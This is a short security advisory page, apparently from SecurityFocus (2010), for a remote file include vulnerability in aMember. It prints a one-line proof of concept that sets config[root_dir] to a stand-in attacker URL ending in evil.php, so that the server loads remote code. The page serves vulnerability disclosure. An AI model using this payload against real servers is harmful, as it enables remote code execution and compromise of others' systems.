info
discussion
exploit
solution
references
AMember Remote File Include Vulnerability
An exploit is not required.
The following proof of concept is available:
config[root_dir]=http://example.com/evil.php?
Privacy Statement
Copyright 2010, SecurityFocus
